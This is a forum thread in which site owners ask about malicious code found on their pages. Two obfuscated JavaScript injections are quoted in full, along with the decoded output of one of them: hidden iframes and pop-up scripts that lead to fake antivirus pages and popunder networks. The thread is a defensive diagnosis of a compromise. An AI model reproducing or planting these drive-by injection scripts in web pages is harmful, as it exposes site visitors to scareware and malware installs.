Is Someone Hacking My Shit?

[Fuzzo]

Hey Guys,

Just back from a holiday and notice that Google has flagged one of my sites as being 'harmful' to users. So I do a quick source code check and something pops up that I'am almost sure hasn't been there before:

</html><!-- ~ --><script type="text/javascript">function oxsletpvxjt(qixfiot){var ddrbvc="";for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));}document.write(ddrbvc);}oxsletpvxjt("3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3Dpsbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E".replace(/psbmbvr/g, ""));</script><!-- ~ -->

I then check the file, and it seems to be fine, no sign of any of this code.

It look's highly supicious, so I have changed all my passwords etc. Waiting on my host to get back to me.

What do you guys think?

 

[Bofu2U]

header injection, make sure you get answers from your host.

 

[Fuzzo]

Thanks for the quick response mate, I appreciate it. So its a problem specific to the host? Would my code allow for this kind of thing to happen?

 

[nickycakes]

like we can see your code

 

[Fuzzo]

like we can see your code

Okay smart ass, I meant 'could' it feasibly allow for a header injection? (And yes, you still can't see my code).

 

[nachoninja]

using wordpress or some other OS script?

 

[Fuzzo]

No its coded from scratch.

 

[nickycakes]

No its coded from scratch.

ok so in theory that means it could be displaying your site and simultaneously controlling the hubble telescope...big help

 

[Fuzzo]

ok so in theory that means it could be displaying your site and simultaneously controlling the hubble telescope...big help

What is the point in you?

 

[Eye_Pull_Rank]

+ Rep for Nicky!

 

[Deliguy]

+ Rep for Nicky!

- Rep for you!

 

[bb_wolfe]

Run an application security scanner against the site/code.

RatProxy works, as do a number of free utilites, just Google it.

 

[Deliguy]

Thats the newest popular way to get spyware installs. People just scan for vulnerabilities with the permissions on templates then it appends the encoded javascript to the bottom of their sites. You need to remove that quickly and change the permissions on your template files. I had that happen with a few outdated cms' before.

 

[ffblueocean]

No its coded from scratch.

Really? Notepad?

 

[Gumby!]

If that is the exact code, it's broken but you should remove it asap.

If you introduced the spaces when you copied and pasted and the code does work, it outputs the following

<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>

which is an iframe to a page loaded with popunders and possibly worse (I didn't check the scripts there)

<!-- BEGIN STANDARD TAG - popunder only - ROS: Run-of-site - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.globalinteractive.com/st?ad_type=pop&ad_size=0x0&section=218703&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1"></SCRIPT>
<!-- END TAG -->

<div style="display:none">
<!-- Start Pop Under - 720x300 Code -->
<script src="http://cds.adecn.com/add/script.js?v=2.2;siteId=61457;spotId=3106;width=720;height=300">
</script>
<!-- End Pop Under - 720x300 Code -->
</div>
<div style="display:none">
<!-- Start Pop Under - 720x300 Code -->
<script src="http://cds.adecn.com/add/script.js?v=2.2;siteId=64583;spotId=8993;width=720;height=300;method=popAd">
</script>
<!-- End Pop Under - 720x300 Code --></div>

<iframe src="http://razmarin.net/a32/index.php"></iframe>
<iframe src="http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/66"></iframe>
         
<script language=JavaScript>
window.open("http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/67", "_blank");
window.open("http://www.youpornztube.com/codec/5060f17b673b0b9bba790dd61bb6de34/14/68", "_blank");
</script>

No way to know if it was your code that allowed them to insert the script without viewing your code, hopefully your host can help.

Just remove all instances of that script and make sure your permissions are set correctly (nothing world writable)

Let me guess, cheap inexperienced PHP programmer programmed the site?

 

[alexa7]

I had a similar thing happen this past weekend. A client's guest book was spammed a couple of times which has never happened in 2 years since the site went up.

I noticed strange figures on the bottom of 3 pages and found this in the source:

<!---->
--b1a5d27b9cc4a62eef5fcf13739216d6-><script
 language="javascript">pmsz="%";tpu="<&73cript lang&75&61&67&65&3d&6a&61v&61scrip&74>&20&20f&75&6ec&74&69&6fn byv&61&28j&29&7bvar&20&69&76s,oz=\"&72&47]&7e&78:&5e&74&6b&4d&42T&62p&49&6641-@&75&33+[&64V&63|\\&22&68n&67&45&6dC&5a&36$,F&2e e&60U9A&26&2a&77j&4b&27&3do&50q&29Jy(Ni#_&61&48&7as}l2v&4f&387!{&30&3b&35\"&2c&73&3d\"\",p&2c&6bwt,r=\"\",s&73&3bf&6f&72(i&76s=&30;i&76&73&3c&6a.le&6e&67th;ivs++){ p=j.&63h&61&72At&28&69&76s&29;&6b&77t&3doz&2ein&64&65xOf(p&29&3bif&28kw&74>&2d&31){ ss=&28&28k&77&74&2b1&29&258&31-1);&69f&28&73&73&3c=&30&29s&73+&3d8&31&3b&72&2b=&6fz.cha&72&41t&28ss&2d&31); }&20e&6c&73e &72+&3dp;}&73&2b&3dr&3b&64oc&75&6dent.w&72it&65(&73);&7d&3c&2fs&63ript&3e";iwb=unescape(tpu.replace(/&/g,pmsz));var a,k;document.write(iwb);a="<}|G#Ike2HgE3HE`ohKHOH}|G#Ikh>eVP|3C`gk jG#k`Neh<SZRfqbe2HgE3HE`o\\hyHOHS|G#Ik\\heSRZo\\hnkkI^//jjj EPPE2`HgH2#k#|} g`k/aa3kp K}?h[VP|3C`gk G`4`GG`G[h\\h><\\/SZRfqb>heJ5e</}|G#Ik>ee";byva(a);</script>

This site is one of the only static sites that I manage. It was made with Golive and uses Advanced Guestbook. The guestbook captcha is over 2 years old and probably needs updated.

Strange